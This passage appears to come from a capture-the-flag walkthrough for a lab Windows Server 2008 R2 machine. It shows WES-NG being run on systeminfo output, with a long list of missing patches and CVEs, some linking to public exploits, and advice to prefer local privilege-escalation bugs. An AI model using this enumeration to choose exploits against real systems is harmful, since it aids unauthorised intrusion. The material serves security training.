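On a fully unpatched host such as this one the list is long, and the first filter worth applying is the one in eop_candidates: remote code execution bugs in DNS or Active Directory do not help a local low-privileged shell, whereas a CSRSS elevation of privilege does.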

Both of the tools mentioned can be found at the following links:

Windows Exploit Suggester (Original)

https://github.com/SecWiki/windows-kernel-exploits/tree/master/win-exp-suggester

WES-NG

https://github.com/bitsadmin/wesng

Let’s go ahead and test that out! (wes.py needs its definitions database before the first run; python wes.py --update downloads it.)

WES-NG Output

python wes.py bastard_sysinfo.txt | tee bastard_vulns_wesng.txt

Windows Exploit Suggester 0.98 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
- Name: Windows Server 2008 R2 for x64-based Systems
- Generation: 2008 R2
- Build: 7600
- Version: None
- Architecture: x64-based
- Installed hotfixes: None
[+] Loading definitions
- Creation date of definitions: 20200504
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Found vulnerabilities

Date: 20110712
CVE: CVE-2011-1282
KB: KB2507938
Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110712
CVE: CVE-2011-1283
KB: KB2507938
Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110712
CVE: CVE-2011-1281
KB: KB2507938
Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110712
CVE: CVE-2011-1285
KB: KB2507938
Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110412
CVE: CVE-2011-0657
KB: KB2509553
Title: Vulnerability in DNS Resolution Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20111213
CVE: CVE-2011-3406
KB: KB2621146
Title: Vulnerability in Active Directory Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Active Directory Lightweight Directory Services
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2011-3402
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2011-3402
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2011-3402
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20111213
CVE: CVE-2011-3408
KB: KB2620712
Title: Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110614
CVE: CVE-2011-1869
KB: KB2535512
Title: Vulnerabilities in Distributed File System Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110614
CVE: CVE-2011-1894
KB: KB2544893
Title: Vulnerability in MHTML Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Information Disclosure
Exploit: n/a

Date: 20110913
CVE: CVE-2011-1984
KB: KB2571621
Title: Vulnerability in WINS Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0181
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0181
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0181
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0180
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0180
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0180
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20081111
CVE: CVE-2007-0099
KB: KB954430
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 4.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0003
KB: KB2742598
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0003
KB: KB2756920
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110412
CVE: CVE-2010-4701
KB: KB2506212
Title: Vulnerabilities in Windows Fax Cover Page Editor Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploits: http://retrogod.altervista.org/9sg_cov_bof.html, http://www.exploit-db.com/exploits/15839

Date: 20120814
CVE: CVE-2012-2523
KB: KB2706045
Title: Vulnerability in JScript and VBScript Engines Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: VBScript 5.8
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20120814
CVE: CVE-2012-2523
KB: KB2706045
Title: Vulnerability in JScript and VBScript Engines Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: JScript 5.8
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20110412
CVE: CVE-2010-3974
KB: KB2506212
Title: Vulnerabilities in Windows Fax Cover Page Editor Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20110308
CVE: CVE-2011-0032
KB: KB2479943
Title: Vulnerabilities in Windows Media Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120214
CVE: CVE-2012-0149
KB: KB2645640
Title: Vulnerabilities in Ancillary Function Driver Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20120612
CVE: CVE-2012-0217
KB: KB2709715
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.exploit-db.com/exploits/28718/, https://www.exploit-db.com/exploits/46508/

Date: 20130409
CVE: CVE-2013-1338
KB: KB2817183
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 9
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1338
KB: KB2817183
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 8
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20121211
CVE: CVE-2012-1537
KB: KB2770660
Title: Vulnerability in DirectPlay Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20110913
CVE: CVE-2011-1991
KB: KB2570947
Title: Vulnerability in Windows Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20091013
CVE: CVE-2009-2510
KB: KB974571
Title: Vulnerabilities in Windows CryptoAPI Could Allow Spoofing
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Spoofing
Exploit: n/a

Date: 20091013
CVE: CVE-2009-2511
KB: KB974571
Title: Vulnerabilities in Windows CryptoAPI Could Allow Spoofing
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Spoofing
Exploit: n/a

Date: 20100608
CVE: CVE-2010-1879
KB: KB979482
Title: Vulnerabilities in Media Decompression Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Asycfilt.dll (COM component)
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110308
CVE: CVE-2011-0029
KB: KB2483614
Title: Vulnerability in Remote Desktop Client Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Remote Desktop Connection 7.0 Client
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20121113
CVE: CVE-2012-2531
KB: KB2716513
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft FTP Service 7.5 for IIS 7.5
Severity: Moderate
Impact: Information Disclosure
Exploit: n/a

Date: 20121113
CVE: CVE-2012-2531
KB: KB2719033
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Moderate
Impact: Information Disclosure
Exploit: n/a

Date: 20121113
CVE: CVE-2012-2532
KB: KB2716513
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft FTP Service 7.5 for IIS 7.5
Severity: Moderate
Impact: Information Disclosure
Exploit: n/a

Date: 20121113
CVE: CVE-2012-2532
KB: KB2719033
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Moderate
Impact: Information Disclosure
Exploit: n/a

Date: 20110111
CVE: CVE-2011-0027
KB: KB2419640
Title: Vulnerabilities in Microsoft Data Access Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Data Access Components 6.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110111
CVE: CVE-2011-0026
KB: KB2419640
Title: Vulnerabilities in Microsoft Data Access Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Data Access Components 6.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20101012
CVE: CVE-2010-3229
KB: KB2207566
Title: Vulnerability in SChannel Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1293
KB: KB2840149
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1293
KB: KB2808735
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20100914
CVE: CVE-2010-2729
KB: KB2347290
Title: Vulnerability in Print Spooler Service Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20101214
CVE: CVE-2010-3147
KB: KB2423089
Title: Vulnerability in Windows Address Book Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploits: http://www.attackvector.org/new-dll-hijacking-exploits-many/, http://www.exploit-db.com/exploits/14745/

Date: 20120508
CVE: CVE-2012-0161
KB: KB2604114
Title: Vulnerabilities in .NET Framework Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0160
KB: KB2604114
Title: Vulnerabilities in .NET Framework Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20111108
CVE: CVE-2011-2016
KB: KB2620704
Title: Vulnerability in Windows Mail and Windows Meeting Space Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0162
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0162
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0162
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0165
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0165
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0165
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0164
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0164
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0164
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0167
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0167
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0167
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20101214
CVE: CVE-2010-3338
KB: KB2305420
Title: Vulnerability in Task Scheduler Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20121113
CVE: CVE-2012-1527
KB: KB2727528
Title: Vulnerabilities in Windows Shell Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120710
CVE: CVE-2012-1524
KB: KB2719177
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 9
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120710
CVE: CVE-2012-1522
KB: KB2719177
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 9
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20091013
CVE: CVE-2009-2524
KB: KB975467
Title: Vulnerability in Local Security Authority Subsystem Service Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1294
KB: KB2813170
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20121113
CVE: CVE-2012-1528
KB: KB2727528
Title: Vulnerabilities in Windows Shell Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20081111
CVE: CVE-2008-4033
KB: KB954430
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 4.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100810
CVE: CVE-2010-2554
KB: KB982799
Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110614
CVE: CVE-2011-1868
KB: KB2535512
Title: Vulnerabilities in Distributed File System Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110208
CVE: CVE-2011-0091
KB: KB2425227
Title: Vulnerabilities in Kerberos Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20121211
CVE: CVE-2012-2549
KB: KB2765809
Title: Vulnerability in IP-HTTPS Component Could Allow Security Feature Bypass
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Security Feature Bypass
Exploit: n/a

Date: 20110208
CVE: CVE-2011-0031
KB: KB2475792
Title: Vulnerability in JScript and VBScript Scripting Engines Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: JScript 5.8
Severity: Important
Impact: Information Disclosure
Exploit: n/a

Date: 20110208
CVE: CVE-2011-0031
KB: KB2475792
Title: Vulnerability in JScript and VBScript Scripting Engines Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: VBScript 5.8
Severity: Important
Impact: Information Disclosure
Exploit: n/a

Date: 20130409
CVE: CVE-2013-2014
KB: KB2817183
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 9
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130409
CVE: CVE-2013-2014
KB: KB2817183
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 8
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1292
KB: KB2840149
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1292
KB: KB2808735
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1291
KB: KB2840149
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1291
KB: KB2808735
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1296
KB: KB2813347
Title: Vulnerability in Remote Desktop Client Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Remote Desktop Connection 7.0 Client
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130409
CVE: CVE-2013-2013
KB: KB2817183
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 9
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130409
CVE: CVE-2013-2013
KB: KB2817183
Title: Cumulative Security Update for Internet Explorer
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Internet Explorer 8
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100914
CVE: CVE-2010-2730
KB: KB2124261
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20100914
CVE: CVE-2010-2730
KB: KB2271195
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20120612
CVE: CVE-2012-0173
KB: KB2685939
Title: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0176
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0176
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0176
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120710
CVE: CVE-2012-0175
KB: KB2691442
Title: Vulnerability in Windows Shell Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20120612
CVE: CVE-2012-1515
KB: KB2709715
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20121211
CVE: CVE-2012-4774
KB: KB2758857
Title: Vulnerability in Windows File Handling Component Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20121113
CVE: CVE-2012-4776
KB: KB2729451
Title: Vulnerabilities in .NET Framework Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20121113
CVE: CVE-2012-4777
KB: KB2729451
Title: Vulnerabilities in .NET Framework Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100713
CVE: CVE-2009-3678
KB: KB2032276
Title: Vulnerability in Canonical Display Driver Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20121009
CVE: CVE-2012-2551
KB: KB2743555
Title: Vulnerability in Kerberos Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20121211
CVE: CVE-2012-2556
KB: KB2753842
Title: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20081111
CVE: CVE-2008-4029
KB: KB954430
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 4.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110209
CVE: SPSRV8R2X64SP1
KB: KBSPSRV8R2X64SP1
Title: Windows Server 2008 R2 for x64-based Systems Service Pack 1
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: No more updates
Exploit: n/a

Date: 20120508
CVE: CVE-2012-1848
KB: KB2659262
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-1848
KB: KB2656410
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120508
CVE: CVE-2012-1848
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100511
CVE: CVE-2010-0816
KB: KB978542
Title: Vulnerability in Outlook Express and Windows Mail Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Live Mail 2011
Severity: Critical
Impact: Remote Code Execution
Exploits: http://archives.neohapsis.com/archives/bugtraq/2010-05/0068.html, http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=13&Itemid=13, http://www.securityfocus.com/bid/40052

Date: 20130212
CVE: CVE-2013-0073
KB: KB2789644
Title: Vulnerability in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130212
CVE: CVE-2013-0075
KB: KB2790655
